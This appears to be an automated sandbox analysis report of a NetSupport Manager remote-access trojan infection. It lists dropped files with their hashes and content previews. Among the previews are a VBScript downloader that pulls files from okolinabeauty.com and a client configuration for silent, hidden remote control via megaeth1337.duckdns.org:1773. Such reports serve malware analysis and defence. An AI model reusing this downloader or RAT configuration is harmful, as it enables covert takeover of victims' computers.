                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l.,.(.BL(.BL(.BL(.CL0.BL^b9L+.BL^b?L*.BL!..L*.BL!..L).BL^b/L".BL!..L*.BL!..L).BL!..L).BLRich(.BL........PE..d.....KN.........." .....`...........J..............................................H ..........................................................(.......`............b..`.......H....p...............................................p...............................text....Z.......\.................. ..h.rdata.......p.......`..............@..H.data................l..............@....pdata...............p..............@..HINIT.................t.............. ....rsrc...`............x..............@..B.reloc..@............`..............@..B................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\x64\gdihook5.sys

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):70240
                                                                                                                    Entropy (8bit):5.649795184953094
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:p8c59WTkwv6MY2d7kz/ET9Hx2aOlP30Bhs1RQuX210ze9MQN7Z2ym+4lcf7xl8uF:qqi8L2dwz/ET9HB1kzQNlkYjaDCCM
                                                                                                                    MD5:9A348ED02F8B1EFC9BFC5F53827F8A9C
                                                                                                                    SHA1:C1F22705392AF57B277D1FB4F46258DDDFFE8F33
                                                                                                                    SHA-256:641F2B86F013A95707FFDF0F584E3A83FEDC1392CEA3B546905B9CCB54AE10CF
                                                                                                                    SHA-512:9DEBB460FD74CB586ED66B7FA4BBB51A8E1184C1A061E81F4FD6F5E700FDB1E91B809A3F517FE55DD889F60DF6EA29190455073DFA1CB5B85032B91EFD12033F
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>.K.P.K.P.K.P.K.Q.H.P.=3+.N.P.B..I.P.B..J.P.=3=.J.P.B..I.P.B..J.P.B...J.P.RichK.P.........................PE..d.....KN..........".................dP.......................................P...............................................................P..<....`..h....@..$.......`...........0 ............................................... ..(............................text...`........................... ..h.rdata....... ......................@..H.data........0......................@....pdata..$....@......................@..HINIT....@....P...................... ....rsrc...h....`......................@..B................................................................................................................................................................................................................................................................

                                                                                                                    C:\ProgramData\NetSupport\NetSupport Manager\RootCerts\NSLRootCertList.0.pem

                                                                                                                    Download File
                                                                                                                    Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                                                    File Type:PEM certificate
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):33990
                                                                                                                    Entropy (8bit):5.9765409918599
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:768:Wx9cmQ3vUSF9Dd0YmIwJC8xNWKUFOdxJwuICxFys:WixFWJLbWK0OdApCxL
                                                                                                                    MD5:7DE039871EB7B045E08360A820733E8F
                                                                                                                    SHA1:E1F85B993B87C81CB3B04A35CFCF751128218C79
                                                                                                                    SHA-256:FA69A6EC5798B978B4D7ED2D22DFFCB2E8F8D14146C2E4BE7C17245DD52955FC
                                                                                                                    SHA-512:A6BA3DBCFAA53BEFB23162B2CE052E282EAAB404C9D1AFED0A7E2A8CA8521635575AEB116FE553FB5FD7FD67ADAB231F6CB821F8937152A0D474E60FDC7FFE4B
                                                                                                                    Malicious:false
                                                                                                                    Preview:-----BEGIN CERTIFICATE-----..MIIFmTCCA4GgAwIBAgIQea0WoUqgpa1Mc1j0BxMuZTANBgkqhkiG9w0BAQUFADBf..MRMwEQYKCZImiZPyLGQBGRYDY29tMRkwFwYKCZImiZPyLGQBGRYJbWljcm9zb2Z0..MS0wKwYDVQQDEyRNaWNyb3NvZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkw..HhcNMDEwNTA5MjMxOTIyWhcNMjEwNTA5MjMyODEzWjBfMRMwEQYKCZImiZPyLGQB..GRYDY29tMRkwFwYKCZImiZPyLGQBGRYJbWljcm9zb2Z0MS0wKwYDVQQDEyRNaWNy..b3NvZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwggIiMA0GCSqGSIb3DQEB..AQUAA4ICDwAwggIKAoICAQDzXfqAZ9Rap6kMLJAg0DUIPHWEzbcHiZyJ2t7Ow2D6..kWhanpRxKRh2fMLgyCV2lA5Y+gQ0Nubfr/eAuulYCyuT5Z0F43cikfc0ZDwikR1e..4QmQvBT+/HVYGeF5tweSo66IWQjYnwfKA1j8aCltMtfSqMtL/OELSDJP5uu4rU/k..XG8TlJnbldV126gat5SRtHdb9UgMj2p5fRRwBH1tr5D12nDYR7e/my9s5wW34RFg..rHmRFHzF1qbk4X7Vw37lktI8ALU2gt554W3ztW74nzPJy1J9c5g224uha6KVl5uj..3sJNJv8GlmclBsjnrOTuEjOVMZnINQhONMp5U9W1vmMyWUA2wKVOBE0921sHM+RY..v+8/U2TYQlk1V/0PRXwkBE2e1jh0EZcikM5oRHSSb9VLb7CG48c2QqDQ/MHAWvmj..YbkwR3GWChawkcBCle8Qfyhq4yofseTNAz93cQTHIPxJDx1FiKTXy36IrY4t7EXb..xFEEySr87IaemhGXW97OU4jm4rf9rJXCKEDb7wSQ34EzOdm

                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\NSM[1].lic

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):253
                                                                                                                    Entropy (8bit):5.069358624511852
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:Iyovk4xRPjwxVza1DKHMoEEjLgpW2MQDHZYpPM/io6K6a8l6i7s:IFR7wx9vJjjqW2M5PM/iovH8l6J
                                                                                                                    MD5:D2C2217861F5535686409D80A0867F6F
                                                                                                                    SHA1:F4D90BEBFCF8F501E5B9F0427028F696C3A191C7
                                                                                                                    SHA-256:AF9C79CF3AF6A7E969208DA78DFCFAC54D6F956545B46F434D0E447CFF94807B
                                                                                                                    SHA-512:656DEAC03F9D81792E3D78108FB7D6754CA4A21A30F0E8DA72E71F64B0B015DFC299D5478A8CC27ACB05A0EC7E01C2C1CFCC9EB40041E4FE0A790414E42B4A37
                                                                                                                    Malicious:false
                                                                                                                    Preview:1400..0x98f177db....; NetSupport License File...; Generated on 02:59 - 15/09/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=NSM1234..maxslaves=9999..os2=1..product=10..serial_no=NSM1234..shrink_wrap=0..transport=0..

                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vrep[1].msi

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Number of Characters: 0, Last Saved By: InstallShield, Number of Words: 0, Title: Installation Database (English), Comments: NetSupport Manager Version 14.10.0003, Keywords: Installer,MSI,Database, Subject: NetSupport Manager, Author: NetSupport Ltd, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 2016 - Premier Edition with Virtualization Pack 23, Last Saved Time/Date: Fri Jun 14 07:06:31 2024, Create Time/Date: Fri Jun 14 07:06:31 2024, Last Printed: Fri Jun 14 07:06:31 2024, Revision Number: {8FA17BDF-C6BA-4483-AA65-62957D834D73}, Code page: 1252, Template: Intel;1033
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):41645568
                                                                                                                    Entropy (8bit):7.965918169264881
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:786432:5HqloPKB2RMErvURcUNnywXha1rc3fZ+L28IB1P77y059ze5aaSJJgV6UBXYKe:5HqGRME72cUNnywXg63fxB1P3y031aS1
                                                                                                                    MD5:87EF82757ABA83E7EB63C7C35DBAE97A
                                                                                                                    SHA1:7418C4DDEECBA68E253E89622AD9CA45597D9350
                                                                                                                    SHA-256:79040421B5A48DCC6E611DFE187B2F3E355791AD8511ADB84F5C0948AA1D6C89
                                                                                                                    SHA-512:605495995A07D7DFAA5D8F09B9D5BDE1E0281B5B6581923B9FBD7C103E5CA9F2BB8DCF8E1049C21BD90AC4D68759270D5453E0414C2F6E1EB3EF877EEE1A5533
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vrep[1].msi, Author: Joe Security
                                                                                                                    Preview:......................>...................|...............8........6....................................................................................................................................................................................................................................................................... ... ...!...!..."..."...#...#...$...$...%...%...&...&...'...'...(...(...)...)...*...*...+...+...,...,...-...-.........../.../...0...0...1...1...2...2...3...3...4...4...5...5...6..........;................................................................... ..............................................."...!...*...#...$...%...&...'...(...).......+...4...-......./...0...1...2...3...6...5...C...7...J...M...:...<.......=...>...?.......A...B....=..E.......F...G...H...I...Z...Q...L...N.......O...P.......f...S...T...U...V...W...X...Y...K...[...\...]...^..._...`...a...b...c...d...e...h...g...t...i...j...k...l...m...n...o...p...q...r...s...v...u.......w...x...y...z...

                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Client32[1].ini

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):837
                                                                                                                    Entropy (8bit):5.545169772353752
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:UBhzEPmPT8FVXR8piBlnx61fXXfDH2ijr6cgEW3ZN4A2U6L:UBtuK+VXypGlnx61fHfXj+cg3ZO
                                                                                                                    MD5:250A4FAF94B2F88B0DF98A09055F3816
                                                                                                                    SHA1:847485AA647528AFA0CB3D0C2CD5B4C4E7822B74
                                                                                                                    SHA-256:7AD25E0A4A394A76A24278EC2DA937C461B0E439F03F085F6E2A6A4510C39518
                                                                                                                    SHA-512:7AAFEB28CACB1A97C08FCF465B0D307D72ECBB6CBF3C79786CB6B7A600C30C1268A07CD0CB3004CCFF479F6391591307EA49500503A72FC9377B0FAC16E0E94E
                                                                                                                    Malicious:false
                                                                                                                    Preview:0xa7cd73d8....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableLocalInventory=1..DisableManageServices=0..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..IgnoreBroadcastMsg=1..Protocols=2,3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SysTray=0..Usernames=CHPOK/1895053373....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0..Password=dgAAAG33wgESVHuw(gLo2JUzbBoA....[HTTP]..GatewayAddress=megaeth1337.duckdns.org:1773..gsk=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..gskmode=0..GSK=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..GSKX=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..Port=1773....[View]..LimitColorbits=7..

                                                                                                                    C:\Users\user\AppData\Local\Temp\50d669f573135aafd57c..vbs

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\Pyyidau.vbs.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2891
                                                                                                                    Entropy (8bit):4.051212311792211
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:ez+xD8KvBvtvUlvLvMIlubCKvBvtvUlvgvPxI1iKvBvtvUlvKvCwQY1J:e2rZFMlzXMtZFMlonq1hZFMlCqBYz
                                                                                                                    MD5:905AD4C0382EAE16DF4C0DEA8E4D2FCC
                                                                                                                    SHA1:6597192580595528A3A24CF94C4B44E44CFA6BE4
                                                                                                                    SHA-256:49F4E7CDD3716A8E33A6659DAA709606A4D74AE84525FA395EFD8687F7E9D2AE
                                                                                                                    SHA-512:CC5784D1DA871001A838D9EA2AC774CC727CB0D0F8CB76F05AE76FD35FD4BFF86BF3418B4ABF32F9477F25FBB7710A3FC961072CC95E1A4AFD83C7A19DCBAA09
                                                                                                                    Malicious:true
                                                                                                                    Preview:On Error Resume Next.. Dim xmlHttp, fileSystem, tempFolder, targetFile, binaryStream, nsmFile, clientFile.... ' init.. Set xmlHttp = CreateObject("MSXML2.XMLHTTP").. Set fileSystem = CreateObject("Scripting.FileSystemObject").. Set tempFolder = fileSystem.GetSpecialFolder(2) ' Folder %TEMP%.... ' dl NSM.lic.. nsmFile = tempFolder & "\NSM.lic".. xmlHttp.Open "GET", "https://okolinabeauty.com/choh/NSM.lic", False.. xmlHttp.Send.. If xmlHttp.Status = 200 Then.. Set binaryStream = CreateObject("ADODB.Stream").. binaryStream.Type = 1 ' bin.. binaryStream.Open.. binaryStream.Write xmlHttp.responseBody.. binaryStream.SaveToFile nsmFile, 2.. binaryStream.Close.. End If.... ' dl Client32.ini..

                                                                                                                    C:\Users\user\AppData\Local\Temp\Client32.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):837
                                                                                                                    Entropy (8bit):5.545169772353752
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:UBhzEPmPT8FVXR8piBlnx61fXXfDH2ijr6cgEW3ZN4A2U6L:UBtuK+VXypGlnx61fHfXj+cg3ZO
                                                                                                                    MD5:250A4FAF94B2F88B0DF98A09055F3816
                                                                                                                    SHA1:847485AA647528AFA0CB3D0C2CD5B4C4E7822B74
                                                                                                                    SHA-256:7AD25E0A4A394A76A24278EC2DA937C461B0E439F03F085F6E2A6A4510C39518
                                                                                                                    SHA-512:7AAFEB28CACB1A97C08FCF465B0D307D72ECBB6CBF3C79786CB6B7A600C30C1268A07CD0CB3004CCFF479F6391591307EA49500503A72FC9377B0FAC16E0E94E
                                                                                                                    Malicious:false
                                                                                                                    Preview:0xa7cd73d8....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableLocalInventory=1..DisableManageServices=0..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..IgnoreBroadcastMsg=1..Protocols=2,3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SysTray=0..Usernames=CHPOK/1895053373....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0..Password=dgAAAG33wgESVHuw(gLo2JUzbBoA....[HTTP]..GatewayAddress=megaeth1337.duckdns.org:1773..gsk=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..gskmode=0..GSK=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..GSKX=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..Port=1773....[View]..LimitColorbits=7..

                                                                                                                    C:\Users\user\AppData\Local\Temp\DLL_{CBB68368-7767-4CFF-B3E5-211488346702}.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):7454
                                                                                                                    Entropy (8bit):5.306529657572736
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:RYvnYKY7YuY8YAYzhY8Y3YpYsULTYdYfYpQYPNYKYZ3YYkYRY1Yn6U8bYWYFYLY0:RabeTtREhzaeKLTYiXQNJHFCK4SxgezD
                                                                                                                    MD5:B2D1EAE601A80EF3A192ED03212226BB
                                                                                                                    SHA1:528905D11115CA7B572E8662D420538962547C6E
                                                                                                                    SHA-256:EE3393232FE588D8BFCC6C0F0E5DC380D3F1A15788AAECD015A9E2784AD27B55
                                                                                                                    SHA-512:4B750FC32E05F0DDA04724F42E34D3411F9118DD9A0AA2CE7B4BC28C002EB81EC88B8ED5043D09F026875FF4B42770AB9DD9C3D6C0653CA96829ABF4A5FAFA75
                                                                                                                    Malicious:false
                                                                                                                    Preview:[DLL31]..Return=void..Module=kernel32.dll..Func=GetPrivateProfileStringA..Arg0=in,"DesktopIcons",STRING..Arg1=in,"TutorDeskIcon",STRING..Arg2=in,[TUTORDESKICON],STRING..Arg3=out,[TUTORDESKICON],STRING..Arg4=inout,[STRINGSIZE],NUMBER..Arg5=in,[INIFILEPATH],STRING..Silent=No..Source=Local,kernel32.dll..[DLL30]..Return=void..Module=kernel32.dll..Func=GetPrivateProfileStringA..Arg0=in,"DesktopIcons",STRING..Arg1=in,"TechConsoleDeskIcon",STRING..Arg2=in,[TECHCONSOLEDESKICON],STRING..Arg3=out,[TECHCONSOLEDESKICON],STRING..Arg4=inout,[STRINGSIZE],NUMBER..Arg5=in,[INIFILEPATH],STRING..Silent=No..Source=Local,kernel32.dll..[DLL29]..Return=void..Module=kernel32.dll..Func=GetPrivateProfileStringA..Arg0=in,"DesktopIcons",STRING..Arg1=in,"ControlDeskIcon",STRING..Arg2=in,[CONTROLDESKICON],STRING..Arg3=out,[CONTROLDESKICON],STRING..Arg4=inout,[STRINGSIZE],NUMBER..Arg5=in,[INIFILEPATH],STRING..Silent=No..Source=Local,kernel32.dll..[DLL28]..Return=void..Module=kernel32.dll..Func=GetPrivateProfileStrin

                                                                                                                    C:\Users\user\AppData\Local\Temp\NSM.lic

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):253
                                                                                                                    Entropy (8bit):5.069358624511852
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6:Iyovk4xRPjwxVza1DKHMoEEjLgpW2MQDHZYpPM/io6K6a8l6i7s:IFR7wx9vJjjqW2M5PM/iovH8l6J
                                                                                                                    MD5:D2C2217861F5535686409D80A0867F6F
                                                                                                                    SHA1:F4D90BEBFCF8F501E5B9F0427028F696C3A191C7
                                                                                                                    SHA-256:AF9C79CF3AF6A7E969208DA78DFCFAC54D6F956545B46F434D0E447CFF94807B
                                                                                                                    SHA-512:656DEAC03F9D81792E3D78108FB7D6754CA4A21A30F0E8DA72E71F64B0B015DFC299D5478A8CC27ACB05A0EC7E01C2C1CFCC9EB40041E4FE0A790414E42B4A37
                                                                                                                    Malicious:false
                                                                                                                    Preview:1400..0x98f177db....; NetSupport License File...; Generated on 02:59 - 15/09/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=NSM1234..maxslaves=9999..os2=1..product=10..serial_no=NSM1234..shrink_wrap=0..transport=0..

                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sbsabwnc.5wz.psm1

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\Pyyidau.vbs.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzha1xoy.ipd.ps1

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\Pyyidau.vbs.exe
                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):60
                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                    Malicious:false
                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                    C:\Users\user\AppData\Local\Temp\vrep.msi

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\wscript.exe
                                                                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Number of Characters: 0, Last Saved By: InstallShield, Number of Words: 0, Title: Installation Database (English), Comments: NetSupport Manager Version 14.10.0003, Keywords: Installer,MSI,Database, Subject: NetSupport Manager, Author: NetSupport Ltd, Security: 1, Number of Pages: 200, Name of Creating Application: InstallShield 2016 - Premier Edition with Virtualization Pack 23, Last Saved Time/Date: Fri Jun 14 07:06:31 2024, Create Time/Date: Fri Jun 14 07:06:31 2024, Last Printed: Fri Jun 14 07:06:31 2024, Revision Number: {8FA17BDF-C6BA-4483-AA65-62957D834D73}, Code page: 1252, Template: Intel;1033
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):41645568
                                                                                                                    Entropy (8bit):7.965918169264881
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:786432:5HqloPKB2RMErvURcUNnywXha1rc3fZ+L28IB1P77y059ze5aaSJJgV6UBXYKe:5HqGRME72cUNnywXg63fxB1P3y031aS1
                                                                                                                    MD5:87EF82757ABA83E7EB63C7C35DBAE97A
                                                                                                                    SHA1:7418C4DDEECBA68E253E89622AD9CA45597D9350
                                                                                                                    SHA-256:79040421B5A48DCC6E611DFE187B2F3E355791AD8511ADB84F5C0948AA1D6C89
                                                                                                                    SHA-512:605495995A07D7DFAA5D8F09B9D5BDE1E0281B5B6581923B9FBD7C103E5CA9F2BB8DCF8E1049C21BD90AC4D68759270D5453E0414C2F6E1EB3EF877EEE1A5533
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Local\Temp\vrep.msi, Author: Joe Security
                                                                                                                    Preview:......................>...................|...............8........6....................................................................................................................................................................................................................................................................... ... ...!...!..."..."...#...#...$...$...%...%...&...&...'...'...(...(...)...)...*...*...+...+...,...,...-...-.........../.../...0...0...1...1...2...2...3...3...4...4...5...5...6..........;................................................................... ..............................................."...!...*...#...$...%...&...'...(...).......+...4...-......./...0...1...2...3...6...5...C...7...J...M...:...<.......=...>...?.......A...B....=..E.......F...G...H...I...Z...Q...L...N.......O...P.......f...S...T...U...V...W...X...Y...K...[...\...]...^..._...`...a...b...c...d...e...h...g...t...i...j...k...l...m...n...o...p...q...r...s...v...u.......w...x...y...z...

                                                                                                                    C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\Client32.ini

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):837
                                                                                                                    Entropy (8bit):5.545169772353752
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:UBhzEPmPT8FVXR8piBlnx61fXXfDH2ijr6cgEW3ZN4A2U6L:UBtuK+VXypGlnx61fHfXj+cg3ZO
                                                                                                                    MD5:250A4FAF94B2F88B0DF98A09055F3816
                                                                                                                    SHA1:847485AA647528AFA0CB3D0C2CD5B4C4E7822B74
                                                                                                                    SHA-256:7AD25E0A4A394A76A24278EC2DA937C461B0E439F03F085F6E2A6A4510C39518
                                                                                                                    SHA-512:7AAFEB28CACB1A97C08FCF465B0D307D72ECBB6CBF3C79786CB6B7A600C30C1268A07CD0CB3004CCFF479F6391591307EA49500503A72FC9377B0FAC16E0E94E
                                                                                                                    Malicious:false
                                                                                                                    Preview:0xa7cd73d8....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableLocalInventory=1..DisableManageServices=0..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..IgnoreBroadcastMsg=1..Protocols=2,3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..ShowUIOnConnect=0..silent=1..SKMode=1..SysTray=0..Usernames=CHPOK/1895053373....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0..Password=dgAAAG33wgESVHuw(gLo2JUzbBoA....[HTTP]..GatewayAddress=megaeth1337.duckdns.org:1773..gsk=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..gskmode=0..GSK=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..GSKX=GC;H@BDHHJ;D@KBNEF9L>OCDGJ..Port=1773....[View]..LimitColorbits=7..

                                                                                                                    C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\Client32.upd

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):25
                                                                                                                    Entropy (8bit):4.243856189774724
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:tekKKv0ov:JR8y
                                                                                                                    MD5:C05C19B006D57DD4C90785CBE5C7877B
                                                                                                                    SHA1:34BEEBB832E53E4A3B9B3349919689FDF1401151
                                                                                                                    SHA-256:00E0C629D5645C15DF66ADCF99E8A0A3E517D7A7876141AE7A752F0585EEC047
                                                                                                                    SHA-512:BEDE1E24476A12E9B1F29962254B19B357BFDFBE5C6EEC9A2FCA6C1B2105F4CEC1D5872F6BE269EF39D6E5CC542DC587EA9555EF87687BAC64B3FF0DE16C0F8C
                                                                                                                    Malicious:false
                                                                                                                    Preview:[Client]..RoomSpec=Eval..

                                                                                                                    C:\Users\user\AppData\Local\Temp\{CBB68368-7767-4CFF-B3E5-211488346702}\NS.inf

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):928
                                                                                                                    Entropy (8bit):3.5084050573465384
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12:Q+eS1kWlWlp+an4gb0mfkPz4lmfkPVvmfkPVWmfs8xU37+NylWl8ajEiRFGjowA:Q+eS3WTr4gtc79cAc9U8E+AW1EMAFA
                                                                                                                    MD5:0973EE7629C5602C2CAF0146AC93058C
                                                                                                                    SHA1:2586483C867FC413132E6874C59A75B027E90FBF
                                                                                                                    SHA-256:2DA5A8A9B0708F1AEBF60379A04E46BF33C5B06DD64916C4EB4F321E34C7E631
                                                                                                                    SHA-512:D92DF68440D735836135F08F256783452ABDE2DC66163C693C2AEA144A7D7463C0F765E4AA684E07315799FB62E194B076F631BAF8229ECEC13E88A366638D7A
                                                                                                                    Malicious:false
